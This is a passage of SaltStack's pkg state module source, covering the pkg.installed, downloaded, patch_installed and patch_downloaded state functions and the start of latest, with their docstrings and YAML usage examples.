.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: 1.2.3-4
- baz
- pkg_verify:
- ignore_types:
- config
- doc
- verify_options:
- nodeps
- nofiledigest
:param list ignore_types:
List of types to ignore when verifying the package
.. versionadded:: 2014.7.0
:param list verify_options:
List of additional options to pass when verifying the package. These
options will be added to the ``rpm -V`` command, prepended with ``--``
(for example, when ``nodeps`` is passed in this option, ``rpm -V`` will
be run with ``--nodeps``).
.. versionadded:: 2016.11.0
:param bool normalize:
Normalize the package name by removing the architecture, if the
architecture of the package is different from the architecture of the
operating system. The ability to disable this behavior is useful for
poorly-created packages which include the architecture as an actual
part of the name, such as kernel modules which match a specific kernel
version.
.. versionadded:: 2014.7.0
Example:
.. code-block:: yaml
gpfs.gplbin-2.6.32-279.31.1.el6.x86_64:
pkg.installed:
- normalize: False
:param bool ignore_epoch:
If this option is not explicitly set, and there is no epoch in the
desired package version, the epoch will be implicitly ignored. Set this
argument to ``True`` to explicitly ignore the epoch, and ``False`` to
strictly enforce it.
.. versionadded:: 2015.8.9
.. versionchanged:: 3001
In prior releases, the default behavior was to strictly enforce
epochs unless this argument was set to ``True``.
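For example, to pin a version while disregarding the epoch (the
version string below is illustrative):
.. code-block:: yaml
    vim-enhanced:
      pkg.installed:
        - version: 7.4.160-1.el7
        - ignore_epoch: True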
|
**MULTIPLE PACKAGE INSTALLATION OPTIONS: (not supported in pkgng)**
:param list pkgs:
A list of packages to install from a software repository. All packages
listed under ``pkgs`` will be installed via a single command.
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar
- baz
- hold: True
``NOTE:`` For :mod:`apt <salt.modules.aptpkg>`,
:mod:`ebuild <salt.modules.ebuild>`,
:mod:`pacman <salt.modules.pacman>`,
:mod:`winrepo <salt.modules.win_pkg>`,
:mod:`yumpkg <salt.modules.yumpkg>`, and
:mod:`zypper <salt.modules.zypper>`,
version numbers can be specified
in the ``pkgs`` argument. For example:
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: 1.2.3-4
- baz
Additionally, :mod:`ebuild <salt.modules.ebuild>`, :mod:`pacman
<salt.modules.pacman>`, :mod:`zypper <salt.modules.zypper>`,
:mod:`yum/dnf <salt.modules.yumpkg>`, and :mod:`apt
<salt.modules.aptpkg>` support the ``<``, ``<=``, ``>=``, and ``>``
operators for more control over what versions will be installed. For
example:
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: '>=1.2.3-4'
- baz
``NOTE:`` When using comparison operators, the expression must be enclosed
in quotes to avoid a YAML render error.
With :mod:`ebuild <salt.modules.ebuild>` it is also possible to specify a
USE flag list, whether the given packages should be added to the
package.accept_keywords file, and/or the overlay from which you want the
package to be installed. For example:
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo: '~'
- bar: '~>=1.2:slot::overlay[use,-otheruse]'
- baz
:param list sources:
A list of packages to install, along with the source URI or local path
from which to install each package. In the example below, ``foo``,
``bar``, ``baz``, etc. refer to the name of the package, as it would
appear in the output of the ``pkg.version`` or ``pkg.list_pkgs`` salt
CLI commands.
.. code-block:: yaml
mypkgs:
pkg.installed:
- sources:
- foo: salt://rpms/foo.rpm
- bar: http://somesite.org/bar.rpm
- baz: ftp://someothersite.org/baz.rpm
- qux: /minion/path/to/qux.rpm
**PLATFORM-SPECIFIC ARGUMENTS**
These are specific to each OS. If it does not apply to the execution
module for your OS, it is ignored.
:param bool hold:
Force the package to be held at the current installed version.
Supported on YUM/DNF & APT based systems.
.. versionadded:: 2014.7.0
Supported on Zypper-based systems.
.. versionadded:: 3003
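For example (the version string is illustrative):
.. code-block:: yaml
    httpd:
      pkg.installed:
        - version: 2.4.6-93.el7
        - hold: True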
:param bool update_holds:
If ``True``, and this function would update the package version, any
packages which are being held will be temporarily unheld so that they
can be updated. Otherwise, if this function attempts to update a held
package, the held package(s) will be skipped and the state will fail.
By default, this parameter is set to ``False``.
Supported on YUM/DNF & APT based systems.
.. versionadded:: 2016.11.0
Supported on Zypper-based systems.
.. versionadded:: 3003
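For example (package names are placeholders):
.. code-block:: yaml
    mypkgs:
      pkg.installed:
        - pkgs:
          - foo
          - bar
        - update_holds: True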
:param list names:
A list of packages to install from a software repository. Each package
will be installed individually by the package manager.
.. warning::
Unlike ``pkgs``, the ``names`` parameter cannot specify a version.
In addition, it makes a separate call to the package management
frontend to install each package, whereas ``pkgs`` makes just a
single call. It is therefore recommended to use ``pkgs`` instead of
``names`` to install multiple packages, both for the additional
features and the performance improvement that it brings.
:param bool install_recommends:
Whether to install the packages marked as recommended. Default is
``True``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.installed:
- install_recommends: False
:param bool only_upgrade:
Only upgrade the packages, if they are already installed. Default is
``False``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.installed:
- only_upgrade: True
.. note::
If this parameter is set to True and the package is not already
installed, the state will fail.
:param bool report_reboot_exit_codes:
If the installer exits with a recognized exit code indicating that
a reboot is required, the module function
*win_system.set_reboot_required_witnessed*
will be called, preserving the knowledge of this event
for the remainder of the current boot session. For the time being,
``3010`` is the only recognized exit code,
but this is subject to future refinement.
The value of this param
defaults to ``True``. This parameter has no effect
on non-Windows systems.
.. versionadded:: 2016.11.0
.. code-block:: yaml
ms vcpp installed:
pkg.installed:
- name: ms-vcpp
- version: 10.0.40219
- report_reboot_exit_codes: False
:return:
A dictionary containing the state of the software installation
:rtype: dict
.. note::
The ``pkg.installed`` state supports the usage of ``reload_modules``.
This functionality allows you to force Salt to reload all modules. In
many cases, Salt is clever enough to transparently reload the modules.
For example, if you install a package, Salt reloads modules because some
other module or state might require the package which was installed.
However, there are some edge cases where this may not be the case, which
is what ``reload_modules`` is meant to resolve.
You should only use ``reload_modules`` if your ``pkg.installed`` does some
sort of installation where if you do not reload the modules future items
in your state which rely on the software being installed will fail. Please
see the :ref:`Reloading Modules <reloading-modules>` documentation for more
information.
.. seealso:: unless and onlyif
If running pkg commands together with :ref:`aggregate <mod-aggregate-state>`
isn't an option, you can use the :ref:`creates <creates-requisite>`,
:ref:`unless <unless-requisite>`, or :ref:`onlyif <onlyif-requisite>`
syntax to skip a full package run. This can be helpful in large environments
with multiple states that include requisites for packages to be installed.
.. code-block:: yaml
# Using creates for a simple single-factor check
install_nginx:
pkg.installed:
- name: nginx
- creates:
- /etc/nginx/nginx.conf
.. code-block:: yaml
# Using file.file_exists for a single-factor check
install_nginx:
pkg.installed:
- name: nginx
- unless:
- fun: file.file_exists
args:
- /etc/nginx/nginx.conf
# Using unless with a shell test
install_nginx:
pkg.installed:
- name: nginx
- unless: test -f /etc/nginx/nginx.conf
.. code-block:: yaml
# Using file.search for a two-factor check
install_nginx:
pkg.installed:
- name: nginx
- unless:
- fun: file.search
args:
- /etc/nginx/nginx.conf
- 'user www-data;'
The above examples use different methods to reasonably ensure
that a package has already been installed. First, by checking for a
file that would be created with the package. Second, by checking for
specific text within a file that would be created or managed by Salt.
With these requisites satisfied, creates/unless will return ``True`` and the
``pkg.installed`` state will be skipped.
.. code-block:: bash
# Example of state run without unless used
salt 'saltdev' state.apply nginx
saltdev:
----------
ID: install_nginx
Function: pkg.installed
Name: nginx
Result: True
Comment: All specified packages are already installed
Started: 20:11:56.388331
Duration: 4290.0 ms
Changes:
# Example of state run using unless requisite
salt 'saltdev' state.apply nginx
saltdev:
----------
ID: install_nginx
Function: pkg.installed
Name: nginx
Result: True
Comment: unless condition is true
Started: 20:10:50.659215
Duration: 1530.0 ms
Changes:
The result is a reduction of almost 3 seconds. In larger environments,
small reductions in waiting time can add up.
:ref:`Unless Requisite <unless-requisite>`
"""
if isinstance(pkgs, list) and len(pkgs) == 0:
return {
"name": name,
"changes": {},
"result": True,
"comment": "No packages to install provided",
}
# If just a name (and optionally a version) is passed, just pack them into
# the pkgs argument.
if name and not any((pkgs, sources)):
if version:
pkgs = [{name: version}]
version = None
else:
pkgs = [name]
kwargs["saltenv"] = __env__
refresh = salt.utils.pkg.check_refresh(__opts__, refresh)
# check if capabilities should be checked and modify the requested packages
# accordingly.
if pkgs:
pkgs, refresh = _resolve_capabilities(pkgs, refresh=refresh, **kwargs)
if not isinstance(pkg_verify, list):
pkg_verify = pkg_verify is True
if (pkg_verify or isinstance(pkg_verify, list)) and "pkg.verify" not in __salt__:
return {
"name": name,
"changes": {},
"result": False,
"comment": "pkg.verify not implemented",
}
if not isinstance(version, str) and version is not None:
version = str(version)
kwargs["allow_updates"] = allow_updates
result = _find_install_targets(
name,
version,
pkgs,
sources,
fromrepo=fromrepo,
skip_suggestions=skip_suggestions,
pkg_verify=pkg_verify,
normalize=normalize,
ignore_epoch=ignore_epoch,
reinstall=reinstall,
refresh=refresh,
**kwargs
)
try:
(
desired,
targets,
to_unpurge,
to_reinstall,
altered_files,
warnings,
was_refreshed,
) = result
if was_refreshed:
refresh = False
except ValueError:
# _find_install_targets() found no targets or encountered an error
# check that the hold function is available
if "pkg.hold" in __salt__ and "hold" in kwargs:
try:
action = "pkg.hold" if kwargs["hold"] else "pkg.unhold"
hold_ret = __salt__[action](name=name, pkgs=pkgs, sources=sources)
except (CommandExecutionError, SaltInvocationError) as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": str(exc),
}
if "result" in hold_ret and not hold_ret["result"]:
return {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while "
"holding/unholding package(s): {}".format(hold_ret["comment"])
),
}
else:
modified_hold = [
hold_ret[x] for x in hold_ret if hold_ret[x]["changes"]
]
not_modified_hold = [
hold_ret[x]
for x in hold_ret
if not hold_ret[x]["changes"] and hold_ret[x]["result"]
]
failed_hold = [
hold_ret[x] for x in hold_ret if not hold_ret[x]["result"]
]
for i in modified_hold:
result["comment"] += ".\n{}".format(i["comment"])
result["result"] = i["result"]
result["changes"][i["name"]] = i["changes"]
for i in not_modified_hold:
result["comment"] += ".\n{}".format(i["comment"])
result["result"] = i["result"]
for i in failed_hold:
result["comment"] += ".\n{}".format(i["comment"])
result["result"] = i["result"]
return result
if to_unpurge and "lowpkg.unpurge" not in __salt__:
ret = {
"name": name,
"changes": {},
"result": False,
"comment": "lowpkg.unpurge not implemented",
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
# Remove any targets not returned by _find_install_targets
if pkgs:
pkgs = [dict([(x, y)]) for x, y in targets.items()]
pkgs.extend([dict([(x, y)]) for x, y in to_reinstall.items()])
elif sources:
oldsources = sources
sources = [x for x in oldsources if next(iter(list(x.keys()))) in targets]
sources.extend(
[x for x in oldsources if next(iter(list(x.keys()))) in to_reinstall]
)
comment = []
changes = {"installed": {}}
if __opts__["test"]:
if targets:
if sources:
_targets = targets
else:
_targets = [_get_desired_pkg(x, targets) for x in targets]
summary = ", ".join(targets)
changes["installed"].update(
{x: {"new": "installed", "old": ""} for x in targets}
)
comment.append(
"The following packages would be installed/updated: {}".format(summary)
)
if to_unpurge:
comment.append(
"The following packages would have their selection status "
"changed from 'purge' to 'install': {}".format(", ".join(to_unpurge))
)
changes["installed"].update(
{x: {"new": "installed", "old": ""} for x in to_unpurge}
)
if to_reinstall:
# Add a comment for each package in to_reinstall with its
# pkg.verify output
if reinstall:
reinstall_targets = []
for reinstall_pkg in to_reinstall:
if sources:
reinstall_targets.append(reinstall_pkg)
else:
reinstall_targets.append(
_get_desired_pkg(reinstall_pkg, to_reinstall)
)
changes["installed"].update(
{x: {"new": "installed", "old": ""} for x in reinstall_targets}
)
msg = "The following packages would be reinstalled: "
msg += ", ".join(reinstall_targets)
comment.append(msg)
else:
for reinstall_pkg in to_reinstall:
if sources:
pkgstr = reinstall_pkg
else:
pkgstr = _get_desired_pkg(reinstall_pkg, to_reinstall)
comment.append(
"Package '{}' would be reinstalled because the "
"following files have been altered:".format(pkgstr)
)
changes["installed"].update({reinstall_pkg: {}})
comment.append(_nested_output(altered_files[reinstall_pkg]))
ret = {
"name": name,
"changes": changes,
"result": None,
"comment": "\n".join(comment),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
modified_hold = None
not_modified_hold = None
failed_hold = None
if targets or to_reinstall:
try:
pkg_ret = __salt__["pkg.install"](
name=None,
refresh=refresh,
version=version,
fromrepo=fromrepo,
skip_verify=skip_verify,
pkgs=pkgs,
sources=sources,
reinstall=bool(to_reinstall),
normalize=normalize,
update_holds=update_holds,
ignore_epoch=ignore_epoch,
**kwargs
)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while installing package(s): {}".format(
exc
)
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
if refresh:
refresh = False
if isinstance(pkg_ret, dict):
changes["installed"].update(pkg_ret)
elif isinstance(pkg_ret, str):
comment.append(pkg_ret)
# Code below will be looking for a dictionary. If this is a string
# it means that there was an exception raised and that no packages
# changed, so now that we have added this error to the comments we
# set this to an empty dictionary so that the code below which
# checks reinstall targets works.
pkg_ret = {}
if "pkg.hold" in __salt__ and "hold" in kwargs:
try:
action = "pkg.hold" if kwargs["hold"] else "pkg.unhold"
hold_ret = __salt__[action](name=name, pkgs=desired)
except (CommandExecutionError, SaltInvocationError) as exc:
comment.append(str(exc))
ret = {
"name": name,
"changes": changes,
"result": False,
"comment": "\n".join(comment),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
else:
if "result" in hold_ret and not hold_ret["result"]:
ret = {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while "
"holding/unholding package(s): {}".format(hold_ret["comment"])
),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
else:
modified_hold = [
hold_ret[x] for x in hold_ret if hold_ret[x]["changes"]
]
not_modified_hold = [
hold_ret[x]
for x in hold_ret
if not hold_ret[x]["changes"] and hold_ret[x]["result"]
]
failed_hold = [
hold_ret[x] for x in hold_ret if not hold_ret[x]["result"]
]
if to_unpurge:
changes["purge_desired"] = __salt__["lowpkg.unpurge"](*to_unpurge)
# Analyze pkg.install results for packages in targets
if sources:
modified = [x for x in changes["installed"] if x in targets]
not_modified = [
x for x in desired if x not in targets and x not in to_reinstall
]
failed = [x for x in targets if x not in modified]
else:
if __grains__["os"] == "FreeBSD":
kwargs["with_origin"] = True
new_pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
if (
kwargs.get("resolve_capabilities", False)
and "pkg.list_provides" in __salt__
):
new_caps = __salt__["pkg.list_provides"](**kwargs)
else:
new_caps = {}
_ok, failed = _verify_install(
desired, new_pkgs, ignore_epoch=ignore_epoch, new_caps=new_caps
)
modified = [x for x in _ok if x in targets]
not_modified = [x for x in _ok if x not in targets and x not in to_reinstall]
failed = [x for x in failed if x in targets]
# If there was nothing unpurged, just set the changes dict to the contents
# of changes['installed'].
if not changes.get("purge_desired"):
changes = changes["installed"]
if modified:
if sources:
summary = ", ".join(modified)
else:
summary = ", ".join([_get_desired_pkg(x, desired) for x in modified])
if len(summary) < 20:
comment.append(
"The following packages were installed/updated: {}".format(summary)
)
else:
comment.append(
"{} targeted package{} {} installed/updated.".format(
len(modified),
"s" if len(modified) > 1 else "",
"were" if len(modified) > 1 else "was",
)
)
if modified_hold:
for i in modified_hold:
change_name = i["name"]
if change_name in changes:
comment.append(i["comment"])
if len(changes[change_name]["new"]) > 0:
changes[change_name]["new"] += "\n"
changes[change_name]["new"] += "{}".format(i["changes"]["new"])
if len(changes[change_name]["old"]) > 0:
changes[change_name]["old"] += "\n"
changes[change_name]["old"] += "{}".format(i["changes"]["old"])
else:
comment.append(i["comment"])
changes[change_name] = {}
changes[change_name]["new"] = "{}".format(i["changes"]["new"])
# Any requested packages that were not targeted for install or reinstall
if not_modified:
if sources:
summary = ", ".join(not_modified)
else:
summary = ", ".join([_get_desired_pkg(x, desired) for x in not_modified])
if len(not_modified) <= 20:
comment.append(
"The following packages were already installed: {}".format(summary)
)
else:
comment.append(
"{} targeted package{} {} already installed".format(
len(not_modified),
"s" if len(not_modified) > 1 else "",
"were" if len(not_modified) > 1 else "was",
)
)
if not_modified_hold:
for i in not_modified_hold:
comment.append(i["comment"])
result = True
if failed:
if sources:
summary = ", ".join(failed)
else:
summary = ", ".join([_get_desired_pkg(x, desired) for x in failed])
comment.insert(
0, "The following packages failed to install/update: {}".format(summary)
)
result = False
if failed_hold:
for i in failed_hold:
comment.append(i["comment"])
result = False
# Get the ignore_types list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("ignore_types") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "ignore_types" in x
):
ignore_types = next(
x.get("ignore_types") for x in pkg_verify if "ignore_types" in x
)
else:
ignore_types = []
# Get the verify_options list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("verify_options") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "verify_options" in x
):
verify_options = next(
x.get("verify_options") for x in pkg_verify if "verify_options" in x
)
else:
verify_options = []
# Rerun pkg.verify for packages in to_reinstall to determine failed
modified = []
failed = []
for reinstall_pkg in to_reinstall:
if reinstall:
if reinstall_pkg in pkg_ret:
modified.append(reinstall_pkg)
else:
failed.append(reinstall_pkg)
elif pkg_verify:
# No need to wrap this in a try/except because we would already
# have caught invalid arguments earlier.
verify_result = __salt__["pkg.verify"](
reinstall_pkg,
ignore_types=ignore_types,
verify_options=verify_options,
**kwargs
)
if verify_result:
failed.append(reinstall_pkg)
altered_files[reinstall_pkg] = verify_result
else:
modified.append(reinstall_pkg)
if modified:
# Add a comment for each package in modified with its pkg.verify output
for modified_pkg in modified:
if sources:
pkgstr = modified_pkg
else:
pkgstr = _get_desired_pkg(modified_pkg, desired)
msg = "Package {} was reinstalled.".format(pkgstr)
if modified_pkg in altered_files:
msg += " The following files were remediated:"
comment.append(msg)
comment.append(_nested_output(altered_files[modified_pkg]))
else:
comment.append(msg)
if failed:
# Add a comment for each package in failed with its pkg.verify output
for failed_pkg in failed:
if sources:
pkgstr = failed_pkg
else:
pkgstr = _get_desired_pkg(failed_pkg, desired)
msg = "Reinstall was not successful for package {}.".format(pkgstr)
if failed_pkg in altered_files:
msg += " The following files could not be remediated:"
comment.append(msg)
comment.append(_nested_output(altered_files[failed_pkg]))
else:
comment.append(msg)
result = False
ret = {
"name": name,
"changes": changes,
"result": result,
"comment": "\n".join(comment),
}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
def downloaded(
name, version=None, pkgs=None, fromrepo=None, ignore_epoch=None, **kwargs
):
"""
.. versionadded:: 2017.7.0
Ensure that the package is downloaded, and that it is the correct version
(if specified).
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to download the package(s). For example, you can include
a ``disablerepo`` argument on platforms that use yum/dnf to disable
that repo:
.. code-block:: yaml
mypkg:
pkg.downloaded:
- disablerepo: base,updates
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
Currently supported for the following pkg providers:
:mod:`yumpkg <salt.modules.yumpkg>`, :mod:`zypper <salt.modules.zypper>`, and :mod:`apt <salt.modules.aptpkg>`
:param str name:
The name of the package to be downloaded. This parameter is ignored if
"pkgs" is used. Additionally, please note that this option can only be
used to download packages from a software repository.
:param str version:
Download a specific version of a package.
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon) must have the epoch included
when specifying the version number. For example:
.. code-block:: yaml
vim-enhanced:
pkg.downloaded:
- version: 2:7.4.160-1.el7
An **ignore_epoch** argument has been added, which causes the
epoch to be disregarded when the state checks to see if the desired
version was installed.
You can install a specific version when using the ``pkgs`` argument by
including the version after the package:
.. code-block:: yaml
common_packages:
pkg.downloaded:
- pkgs:
- unzip
- dos2unix
- salt-minion: 2015.8.5-1.el6
:param bool resolve_capabilities:
Turn on resolving capabilities. This allows one to use "provides" or alias names for packages.
.. versionadded:: 2018.3.0
CLI Example:
.. code-block:: yaml
zsh:
pkg.downloaded:
- version: 5.0.5-4.63
- fromrepo: "myrepository"
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
if "pkg.list_downloaded" not in __salt__:
ret["result"] = False
ret["comment"] = "The pkg.downloaded state is not available on this platform"
return ret
if isinstance(pkgs, list) and len(pkgs) == 0:
ret["result"] = True
ret["comment"] = "No packages to download provided"
return ret
# If just a name (and optionally a version) is passed, just pack them into
# the pkgs argument.
if name and not pkgs:
if version:
pkgs = [{name: version}]
version = None
else:
pkgs = [name]
# It doesn't make sense here to receive 'downloadonly' in kwargs,
# as we're explicitly passing 'downloadonly=True' to the execution module.
if "downloadonly" in kwargs:
del kwargs["downloadonly"]
pkgs, _refresh = _resolve_capabilities(pkgs, **kwargs)
# Only downloading not yet downloaded packages
targets = _find_download_targets(
name, version, pkgs, fromrepo=fromrepo, ignore_epoch=ignore_epoch, **kwargs
)
if isinstance(targets, dict) and "result" in targets:
return targets
elif not isinstance(targets, dict):
ret["result"] = False
ret["comment"] = "An error was encountered while checking targets: {}".format(
targets
)
return ret
if __opts__["test"]:
summary = ", ".join(targets)
ret["comment"] = "The following packages would be downloaded: {}".format(
summary
)
return ret
try:
pkg_ret = __salt__["pkg.install"](
name=name,
pkgs=pkgs,
version=version,
downloadonly=True,
fromrepo=fromrepo,
ignore_epoch=ignore_epoch,
**kwargs
)
ret["result"] = True
ret["changes"].update(pkg_ret)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while downloading package(s): {}".format(exc)
return ret
new_pkgs = __salt__["pkg.list_downloaded"](**kwargs)
_ok, failed = _verify_install(targets, new_pkgs, ignore_epoch=ignore_epoch)
if failed:
summary = ", ".join([_get_desired_pkg(x, targets) for x in failed])
ret["result"] = False
ret["comment"] = "The following packages failed to download: {}".format(summary)
if not ret["changes"] and not ret["comment"]:
ret["result"] = True
ret["comment"] = "Packages downloaded: {}".format(", ".join(targets))
return ret
def patch_installed(name, advisory_ids=None, downloadonly=None, **kwargs):
"""
.. versionadded:: 2017.7.0
Ensure that packages related to certain advisory ids are installed.
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to install the patch(es).
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
Currently supported for the following pkg providers:
:mod:`yumpkg <salt.modules.yumpkg>` and :mod:`zypper <salt.modules.zypper>`
CLI Example:
.. code-block:: yaml
issue-foo-fixed:
pkg.patch_installed:
- advisory_ids:
- SUSE-SLE-SERVER-12-SP2-2017-185
- SUSE-SLE-SERVER-12-SP2-2017-150
- SUSE-SLE-SERVER-12-SP2-2017-120
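The related packages can also be fetched without being installed by
passing ``downloadonly`` (a sketch; see also ``pkg.patch_downloaded``):
.. code-block:: yaml
    fetch-foo-patches:
      pkg.patch_installed:
        - advisory_ids:
          - SUSE-SLE-SERVER-12-SP2-2017-185
        - downloadonly: True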
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
if "pkg.list_patches" not in __salt__:
ret["result"] = False
ret[
"comment"
] = "The pkg.patch_installed state is not available on this platform"
return ret
if isinstance(advisory_ids, list) and len(advisory_ids) == 0:
ret["result"] = True
ret["comment"] = "No advisory ids provided"
return ret
# Only downloading not yet downloaded packages
targets = _find_advisory_targets(name, advisory_ids, **kwargs)
if isinstance(targets, dict) and "result" in targets:
return targets
elif not isinstance(targets, list):
ret["result"] = False
ret["comment"] = "An error was encountered while checking targets: {}".format(
targets
)
return ret
if __opts__["test"]:
summary = ", ".join(targets)
ret[
"comment"
] = "The following advisory patches would be downloaded: {}".format(summary)
return ret
try:
pkg_ret = __salt__["pkg.install"](
name=name, advisory_ids=advisory_ids, downloadonly=downloadonly, **kwargs
)
ret["result"] = True
ret["changes"].update(pkg_ret)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while downloading package(s): {}".format(exc)
return ret
if not ret["changes"] and not ret["comment"]:
status = "downloaded" if downloadonly else "installed"
ret["result"] = True
ret[
"comment"
] = "Advisory patch is not needed or related packages are already {}".format(
status
)
return ret
def patch_downloaded(name, advisory_ids=None, **kwargs):
"""
.. versionadded:: 2017.7.0
Ensure that packages related to certain advisory ids are downloaded.
Currently supported for the following pkg providers:
:mod:`yumpkg <salt.modules.yumpkg>` and :mod:`zypper <salt.modules.zypper>`
CLI Example:
.. code-block:: yaml
preparing-to-fix-issues:
pkg.patch_downloaded:
- advisory_ids:
- SUSE-SLE-SERVER-12-SP2-2017-185
- SUSE-SLE-SERVER-12-SP2-2017-150
- SUSE-SLE-SERVER-12-SP2-2017-120
"""
if "pkg.list_patches" not in __salt__:
return {
"name": name,
"result": False,
"changes": {},
"comment": (
"The pkg.patch_downloaded state is not available on this platform"
),
}
# It doesn't make sense here to receive 'downloadonly' in kwargs,
# as we're explicitly passing 'downloadonly=True' to the execution module.
if "downloadonly" in kwargs:
del kwargs["downloadonly"]
return patch_installed(
name=name, advisory_ids=advisory_ids, downloadonly=True, **kwargs
)
def latest(
name,
refresh=None,
fromrepo=None,
skip_verify=False,
pkgs=None,
watch_flags=True,
**kwargs
):
"""
Ensure that the named package is installed and the latest available
package. If the package can be updated, this state function will update
the package. Generally it is better for the
:mod:`installed <salt.states.pkg.installed>` function to be
used, as :mod:`latest <salt.states.pkg.latest>` will update the package
whenever a new package is available.
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to install the package(s). For example, you can include
a ``disablerepo`` argument on platforms that use yum/dnf to disable
that repo:
.. code-block:: yaml
mypkg:
pkg.latest:
- disablerepo: base,updates
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
name
The name of the package to maintain at the latest available version.
This parameter is ignored if "pkgs" is used.
fromrepo
Specify a repository from which to install
skip_verify
Skip the GPG verification check for the package to be installed
refresh
This parameter controls whether or not the package repo database is
updated prior to checking for the latest available version of the
requested packages.
If ``True``, the package database will be refreshed (``apt-get update``
or equivalent, depending on platform) before checking for the latest
available version of the requested packages.
If ``False``, the package database will *not* be refreshed before
checking.
If unset, then Salt treats package database refreshes differently
depending on whether or not a ``pkg`` state has been executed already
during the current Salt run. Once a refresh has been performed in a
``pkg`` state, for the remainder of that Salt run no other refreshes
will be performed for ``pkg`` states which do not explicitly set
``refresh`` to ``True``. This prevents needless additional refreshes
from slowing down the Salt run.
:param str cache_valid_time:
.. versionadded:: 2016.11.0
This parameter sets the value in seconds after which the cache is
marked as invalid, and a cache update is necessary. This overwrites
the ``refresh`` parameter's default behavior.
Example:
.. code-block:: yaml
httpd:
pkg.latest:
- refresh: True
- cache_valid_time: 300
In this case, a refresh will not take place for 5 minutes since the last
``apt-get update`` was executed on the system.
.. note::
This parameter is available only on Debian based distributions and
has no effect on the rest.
:param bool resolve_capabilities:
        Turn on resolving capabilities. This allows one to name "provides" or alias names for packages.
.. versionadded:: 2018.3.0
Multiple Package Installation Options:
(Not yet supported for: FreeBSD, OpenBSD, MacOS, and Solaris pkgutil)
pkgs
A list of packages to maintain at the latest available version.
.. code-block:: yaml
mypkgs:
pkg.latest:
- pkgs:
- foo
- bar
- baz
install_recommends
Whether to install the packages marked as recommended. Default is
``True``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.latest:
- install_recommends: False
only_upgrade
Only upgrade the packages, if they are already installed. Default is
``False``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.latest:
- only_upgrade: True
.. note::
If this parameter is set to True and the package is not already
installed, the state will fail.
report_reboot_exit_codes
If the installer exits with a recognized exit code indicating that
a reboot is required, the module function
*win_system.set_reboot_required_witnessed*
will be called, preserving the knowledge of this event
for the remainder of the current boot session. For the time being,
``3010`` is the only recognized exit code, but this
is subject to future refinement. The value of this param
defaults to ``True``. This parameter has no effect on
non-Windows systems.
.. versionadded:: 2016.11.0
.. code-block:: yaml
ms vcpp installed:
pkg.latest:
- name: ms-vcpp
- report_reboot_exit_codes: False
"""
refresh = salt.utils.pkg.check_refresh(__opts__, refresh)
if kwargs.get("sources"):
return {
"name": name,
"changes": {},
"result": False,
"comment": 'The "sources" parameter is not supported.',
}
elif pkgs:
desired_pkgs = list(_repack_pkgs(pkgs).keys()) # pylint: disable=not-callable
if not desired_pkgs:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": 'Invalidly formatted "pkgs" parameter. See minion log.',
}
else:
if isinstance(pkgs, list) and len(pkgs) == 0:
return {
"name": name,
"changes": {},
"result": True,
"comment": "No packages to install provided",
}
else:
desired_pkgs = [name]
kwargs["saltenv"] = __env__
# check if capabilities should be checked and modify the requested packages
# accordingly.
